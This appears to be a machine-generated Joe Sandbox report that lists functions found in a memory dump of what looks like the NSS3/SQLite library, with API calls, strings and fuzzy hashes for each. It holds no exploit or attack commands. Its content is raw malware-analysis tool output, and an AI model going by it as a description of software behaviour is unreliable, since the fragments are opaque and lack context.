Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 4101233201-598938438
Opcode ID: 9c13f20e17b05c92bffbeec1c53a7a0b13e4fe0f4d23a945d25e827bccfe629e
Instruction ID: 1338e076873cfff932da32471582f82806b0588efc20b7d9c458b78af9907f59
Opcode Fuzzy Hash: 9c13f20e17b05c92bffbeec1c53a7a0b13e4fe0f4d23a945d25e827bccfe629e
Instruction Fuzzy Hash: F162F270A043458FDB04CF6CCC44B9ABBB1AF45318F1A469DD8465BB92D771F886CB98

Function 6C5EAEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6C70CF46,?,6C5DCDBD,?,6C70BF31,?,?,?,?,?,?,?), ref: 6C5EB039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C70CF46,?,6C5DCDBD,?,6C70BF31), ref: 6C5EB090
sqlite3_free.NSS3(?,?,?,?,?,?,6C70CF46,?,6C5DCDBD,?,6C70BF31), ref: 6C5EB0A2
CloseHandle.KERNEL32(?,?,6C70CF46,?,6C5DCDBD,?,6C70BF31,?,?,?,?,?,?,?,?,?), ref: 6C5EB100
sqlite3_free.NSS3(?,?,00000002,?,6C70CF46,?,6C5DCDBD,?,6C70BF31,?,?,?,?,?,?,?), ref: 6C5EB115
sqlite3_free.NSS3(?,?,?,?,?,?,6C70CF46,?,6C5DCDBD,?,6C70BF31), ref: 6C5EB12D

Part of subcall function 6C5D9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C5EC6FD,?,?,?,?,6C63F965,00000000), ref: 6C5D9F0E
Part of subcall function 6C5D9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C63F965,00000000), ref: 6C5D9F5D

Strings

`vl, xrefs: 6C5EB0DF

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID: `vl
API String ID: 3155957115-2789490299
Opcode ID: ddbe366c2cbb9b2ea160f4e1a5ccc63e3dbbc472375d02a24c38e2dd1fc03ccf
Instruction ID: 1f079da992d96c6292bd472e2e837e70d05ca1491dd5efe13bca217fb5519648
Opcode Fuzzy Hash: ddbe366c2cbb9b2ea160f4e1a5ccc63e3dbbc472375d02a24c38e2dd1fc03ccf
Instruction Fuzzy Hash: F591CEB4A043068FDB04DF79DC84A6BBBB1FF49309F244A2DE46697A50EB31E840CB55

Function 6C680EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C680F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C680FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C681006
PK11_FreeSymKey.NSS3(?), ref: 6C68101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C681033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C68103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C681048
memcpy.VCRUNTIME140(?,?,?), ref: 6C68108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C6810BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C6810D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C68112E

Part of subcall function 6C681570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C6808C4,?,?), ref: 6C6815B8
Part of subcall function 6C681570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C6808C4,?,?), ref: 6C6815C1
Part of subcall function 6C681570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C68162E
Part of subcall function 6C681570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C681637

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 1354f8e01301963eb30da1650430bc72c0cf8eb80e1e7f2137106df36f18db51
Instruction ID: 95a798cc19985e93efad62055b12a8c0e60b08f783d87ea23fae4b9588c79c78
Opcode Fuzzy Hash: 1354f8e01301963eb30da1650430bc72c0cf8eb80e1e7f2137106df36f18db51
Instruction Fuzzy Hash: 9971D2B1E012058FDB00CFA5CD84AAAB7F4BF44318F14862DE92997B11EB71D945CBA9

Function 6C5E0FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C5DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C63F9C9,?,6C63F4DA,6C63F9C9,?,?,6C60369A), ref: 6C5DCA7A
Part of subcall function 6C5DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5DCB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C5E103E
EnterCriticalSection.KERNEL32(?), ref: 6C5E1139
LeaveCriticalSection.KERNEL32(?), ref: 6C5E1190
sqlite3_free.NSS3(00000000), ref: 6C5E1227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C5E126E
sqlite3_free.NSS3(?), ref: 6C5E127F

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6C5E1267
Pvl, xrefs: 6C5E109E
winAccess, xrefs: 6C5E129B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: Pvl$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1044067139
Opcode ID: 525564954e9bd7f03e2deb53aa52a786e5f8bf63f95a7dfdedc92532454f0f06
Instruction ID: 6ccc7dfa9a04c45e61262b8c38f5000a6acb006276e5f16995ce397449083123
Opcode Fuzzy Hash: 525564954e9bd7f03e2deb53aa52a786e5f8bf63f95a7dfdedc92532454f0f06
Instruction Fuzzy Hash: BB711B327052059BEB08DF65EC99E6F3376FB8A314F140639E91587A81DB30D901C796

Function 6C6A6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C651C6F,00000000,00000004,?,?), ref: 6C6A6C3F

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C651C6F,00000000,00000004,?,?), ref: 6C6A6C60
PR_ExplodeTime.NSS3(00000000,6C651C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C651C6F,00000000,00000004,?,?), ref: 6C6A6C94

Strings

gfff, xrefs: 6C6A6D30
gfff, xrefs: 6C6A6CFD
gfff, xrefs: 6C6A6D9C
gfff, xrefs: 6C6A6CF5
gfff, xrefs: 6C6A6D66

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: aba68cd10a948fc1c383e9bae302edfacc66bc076a77ce3886d841fe09aeea80
Instruction ID: bfa5ba7393045762ceca7a11ea0f79cdad9d0bbaec1f4d2ca55331b14f21ce55
Opcode Fuzzy Hash: aba68cd10a948fc1c383e9bae302edfacc66bc076a77ce3886d841fe09aeea80
Instruction Fuzzy Hash: 2D513B72B016494FC718CDADDC526DEBBDAABA4310F48C23AE442DB781D678E907C751

Function 6C720F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C721027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7210B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C721353

Strings

%lld, xrefs: 6C72114B
zeroblob(%d), xrefs: 6C721223
NULL, xrefs: 6C72119E
-- , xrefs: 6C720FF5
'%.*q', xrefs: 6C721217, 6C721292
$, xrefs: 6C7212A0
%02x, xrefs: 6C7212F6

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: e7f86b1858f55d24d3e0a4d5795d4c769c4e9257d7c6f0858bf0e255bfac255a
Instruction ID: 8d4b4602e6f5adf40dce6319e0dd2786b8ed0010a3d3955245da7eeca769723a
Opcode Fuzzy Hash: e7f86b1858f55d24d3e0a4d5795d4c769c4e9257d7c6f0858bf0e255bfac255a
Instruction Fuzzy Hash: A4E1AF71A083809FD714CF18C580A6BBBF2BF86348F14896DF98587B51E776E949CB42

Function 6C728FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C728FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7290DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C729118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C72915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7291C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C729209

Strings

3333, xrefs: 6C72925E
UUUU, xrefs: 6C729255

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 27e5d9f35e966f13c94544c034b79f3a96c400b6a6a0daabe985fd4b5f1c65fa
Instruction ID: ca43001c1552c6310601ab2ec2131d25f488031a765146947e29eabf5207f86f
Opcode Fuzzy Hash: 27e5d9f35e966f13c94544c034b79f3a96c400b6a6a0daabe985fd4b5f1c65fa
Instruction Fuzzy Hash: EAA1AF72E001199BDB18CB69CD94BAEB7B5BF48324F0D4179E905A7741E73AEC41CBA0

Function 6C6CEBD0 Relevance: 12.8, APIs: 6, Strings: 1, Instructions: 508COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6CEDD4
TlsGetValue.KERNEL32 ref: 6C6CF19F
PR_SetError.NSS3(FFFFD044,00000000), ref: 6C6CEDF1

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

free.MOZGLUE(?), ref: 6C6CEF9E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6CF1B9
free.MOZGLUE(?), ref: 6C6CF219

Strings

&, xrefs: 6C6CF015

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Error$Valuefree
String ID: &
API String ID: 1919944452-1010288
Opcode ID: 252ade23a6312b29b1721743f7dc6b0427e1f820db9b62461e2fe7cf66fadfe1
Instruction ID: 8b0b9515a1199bb10f11a77d6892613aef2a3d4b342f11d25a65cd973f7f9e78
Opcode Fuzzy Hash: 252ade23a6312b29b1721743f7dc6b0427e1f820db9b62461e2fe7cf66fadfe1
Instruction Fuzzy Hash: 6402E171B04302ABE7008F25DC42BAA77F9EF8530CF184928F95897A91E731E955879B

Function 6C768D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C7B14E4,6C71CC70), ref: 6C768D47
PR_GetCurrentThread.NSS3 ref: 6C768D98

Part of subcall function 6C640F00: PR_GetPageSize.NSS3(6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F1B
Part of subcall function 6C640F00: PR_NewLogModule.NSS3(clock,6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C768E7B
htons.WSOCK32(?), ref: 6C768EDB
PR_GetCurrentThread.NSS3 ref: 6C768F99
PR_GetCurrentThread.NSS3 ref: 6C76910A

Strings

%u.%u.%u.%u, xrefs: 6C768E74

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 75ece2b55c2a005b5f29418a1df9ed47630a8b9911767235f65f295ad47b7d07
Instruction ID: a688033dd2a9626c58d3a350f83fa3dd53b4546242942edabbf2c0b38265c32d
Opcode Fuzzy Hash: 75ece2b55c2a005b5f29418a1df9ed47630a8b9911767235f65f295ad47b7d07
Instruction Fuzzy Hash: C502BA319052518FDB18CF1AC6687AABBB2EF53354F29826ACC915FF92C331D949C790

Function 6C6E68E0 Relevance: 12.2, APIs: 8, Instructions: 241COMMON

Download Yara Rule

APIs

PR_GetIdentitiesLayer.NSS3 ref: 6C6E68FC
PR_EnterMonitor.NSS3 ref: 6C6E6924

Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C7190AB
Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C7190C9
Part of subcall function 6C719090: EnterCriticalSection.KERNEL32 ref: 6C7190E5
Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C719116
Part of subcall function 6C719090: LeaveCriticalSection.KERNEL32 ref: 6C71913F

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

PR_EnterMonitor.NSS3 ref: 6C6E693E
TlsGetValue.KERNEL32 ref: 6C6E6977
TlsGetValue.KERNEL32 ref: 6C6E69B8
PR_ExitMonitor.NSS3 ref: 6C6E6B1E
PR_ExitMonitor.NSS3 ref: 6C6E6B39
TlsGetValue.KERNEL32 ref: 6C6E6B62

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
String ID:
API String ID: 4003455268-0
Opcode ID: 5ea97fb538735b6ca70268f915933e36cb2d7c00f21e023cd1277ae271e3e494
Instruction ID: e8995963fe6b5f60d8531c3138781ac70621b8f0b12c43368bedecfa57f00827
Opcode Fuzzy Hash: 5ea97fb538735b6ca70268f915933e36cb2d7c00f21e023cd1277ae271e3e494
Instruction Fuzzy Hash: D791A17465E104CBDB80EF2DC58059E7B62FB8B318B60C26BC944CFA19E771D952CB89

Function 6C5EEFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6C5EF957, 6C5EF9BA
sqlite_temp_master, xrefs: 6C5EF0A6, 6C5EF2D5
temporary table name must be unqualified, xrefs: 6C5EF734
authorizer malfunction, xrefs: 6C5EF95C, 6C5EF9BF, 6C5EFA5E, 6C5EFA8B
sqlite_master, xrefs: 6C5EF0AB, 6C5EF2DA, 6C5EF757, 6C5EF93E
there is already an index named %s, xrefs: 6C5EF9D7
view, xrefs: 6C5EF061, 6C5EF071, 6C5EFAB7
%s %T already exists, xrefs: 6C5EFAC8
table, xrefs: 6C5EF05C, 6C5EFABC, 6C5EFAC7

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: e9093df05d8465b220e44f2272e121f4dffe5c0cbb086d4787ef28cea9eb10aa
Instruction ID: ba198bc7c99a3ec51f1c9b15177747398e5c32bc2b642da92c7e81c1bf2448bb
Opcode Fuzzy Hash: e9093df05d8465b220e44f2272e121f4dffe5c0cbb086d4787ef28cea9eb10aa
Instruction Fuzzy Hash: A672A170E04205CFDB14CF68D884BA9BBF1BF8D308F1582A9D9159BB52DB75E845CB90

Function 6C6709A0 Relevance: 11.0, APIs: 7, Instructions: 489memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6706A0: TlsGetValue.KERNEL32 ref: 6C6706C2
Part of subcall function 6C6706A0: EnterCriticalSection.KERNEL32(?), ref: 6C6706D6
Part of subcall function 6C6706A0: PR_Unlock.NSS3 ref: 6C6706EB

memcmp.VCRUNTIME140(00000000,6C659B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C659B8A,00000000,k-el), ref: 6C6709D9
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C659B8A,00000000,k-el), ref: 6C6709F2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C659B8A,00000000,k-el), ref: 6C670A1C
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C659B8A,00000000,k-el), ref: 6C670A30
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C659B8A,00000000,k-el), ref: 6C670A48

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
String ID:
API String ID: 115324291-0
Opcode ID: 012a842628279ceb43638276f2411bc262bf69149157c76651952fd59b43424d
Instruction ID: 8a250b57fee814b8509df834fc83c62b9b55d1a70ee51a0ef9f28383a14836e1
Opcode Fuzzy Hash: 012a842628279ceb43638276f2411bc262bf69149157c76651952fd59b43424d
Instruction Fuzzy Hash: 00020FB1E002049FEB108F65DC41BAB77B9EF49318F140929ED05A7B52E732E945CBB9

Function 6C6E6BE0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6E6C2C

Part of subcall function 6C6E6E90: PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C6E6BF7), ref: 6C6E6EB6
Part of subcall function 6C6E6E90: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C78FC0A,6C6E6BF7), ref: 6C6E6ECD
Part of subcall function 6C6E6E90: ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C6E6EE0
Part of subcall function 6C6E6E90: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C6E6EFC
Part of subcall function 6C6E6E90: PR_NewLock.NSS3 ref: 6C6E6F04
